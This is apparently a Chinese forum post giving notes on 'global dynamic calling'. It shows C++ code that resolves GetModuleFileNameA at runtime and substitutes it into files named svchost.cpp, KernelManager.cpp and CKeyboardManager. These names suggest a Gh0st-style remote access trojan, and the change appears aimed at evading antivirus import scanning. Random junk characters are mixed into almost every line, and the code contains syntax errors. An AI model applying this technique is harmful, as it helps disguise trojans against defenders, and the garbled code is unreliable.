[原创文章] 全局动态调用 全局, 动态

ice_xke

全局动态调用笔记$ w: {5 r' k8 C
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h6 X; E: C/ D2 f- }, h) C' z
----------------------------------------
* J" F" C( Q7 }- r" s" c, |) rDTDY.h：
: G) ~! X$ N2 A: V5 Q& Z3 Q( U: x, M+ s  h( x
#if _MSC_VER>1000  k# Q- R% b+ X+ V7 V& m
#pragma once& f8 z" ^" ?2 I- X* {9 I
#endif //_MSC_VER>1000! Q. X7 U6 `8 _. g8 y9 |
#include<windows.h>+ G' t" w/ m4 r9 l+ c
0 D& U) h2 ~% z
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);) Z' J( `/ ~# y, b3 i8 I  z$ w
class DTDY
4 R' [! M" g5 [) R% r; c; R{
. f, f; u; ^) p, F( T# c7 }3 epublic:+ o1 b$ W# L6 g6 w( K
DTDY();3 y! ^$ @6 l/ f1 Z2 Z! d, b" n3 Y
virtual ~DTDY();
7 o- R3 U& \, @1 Z7 S3 A8 wpublic:4 o/ w$ r" g, E/ S# a
static pGetModuleFileNameA MyGetModuleFileName;
6 B0 w* N+ Y+ M) s" t( fstatic BOOL FunInitiallization();
0 x. D& y6 T2 s! p7 ~};. J( T  f+ ], j4 d. C
#endif
) x% p0 U  ^' J  W  K----------------------------------------5 d3 L: ~4 v# }
4 j5 P. W3 D3 n( ]3 Z  H* U
DTDY.cpp:+ K' U$ t1 D2 e3 N# G' n- j
0 F1 p9 L, t$ H1 f
#include "DTDY.h"
- B8 e3 W9 P* z8 j8 X* `7 }pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;; ^& A  K6 J$ E& c7 {
DTDY:TDY()
8 ?! o  x+ L9 U( y4 s{
, Z& ^" i# s- B5 F}
; G! t. m+ s( ~& R' {/ ?DTDY::~DTDY()
& f/ n0 d0 n1 b* `{! W# Y& W- c# N" b/ g
}
4 `" i* z. z1 J0 _# O! J; VBOOL DTDY::FunInitiallization(): |# ~  d8 H7 ?  x' j" ~
{
/ }" Y' H9 A) ^: R% ZHMODULE hModule=LoadLibrary("kernel32.dll");
3 {8 g1 E9 S8 C8 x: ^7 @; ?MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
% S/ e7 b4 K7 k% yif(!MyGetModuleFileName=) return FALSE;! \2 b; G$ _+ h
; y( N' g4 h$ X
return TRUE;
- Z! J  l. S9 ~, C8 N  g9 i' {}
5 V$ w! @$ ~3 }0 r( ~% ?----------------------------------------
* N& k3 H8 h2 s4 B9 a# @svchost.cpp:
$ J0 W3 O8 q+ S( c; _) Y" D. Y6 N. t8 \( G. p; r/ c0 R
#include "DTDY.h"
' V! e; D5 A$ i4 S" o3 @' P$ j! L2 D
/ B0 v  F7 j: n3 L' I& yBOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
7 t& H0 n, R/ k! V{3 [; p/ \, N0 P) U  s6 g
switch(ul_reason_for_call)* E3 e; M! Y  ^$ W5 P8 \. s, P
{1 c: s% a0 J; r, e
case DLL_PROCESS_ATTACH:
/ [) g, j& v! ?- Z% lif(!DTDY::FunInitiallization()) return FALSE;0 j( y# ]" k6 q: z* f& z
- @' j8 _7 ]- F* L* }
break;
. u! W, W% Z' y2 ^# z+ \}
- M$ z  w. _/ y0 p" n( t. L# }}$ C, q* ^6 L) F

+ M) L" V! }6 ^8 {8 M' V3 y- C# r' z  e3 F% h5 c2 p. M
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
$ K, Y+ {  ]7 {4 H6 [改写为. K* U' _9 p; g" j# a, b
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));1 `* S8 t* b0 I  t
----------------------------------------7 z- N1 q: d( C$ o5 X8 @# z
KernelManager.cpp:
6 z" F( U3 h% z
* K, u0 j! l# L2 d: E& V" D#include "../DTDY.h"
2 G1 M; S! y- uGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
2 E. T, c. d0 @1 k! D  P& J. z改写为9 e6 T2 D) m' Y) Y* v4 Z, [
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));, B# h  x- \" o0 y, ]: f
----------------------------------------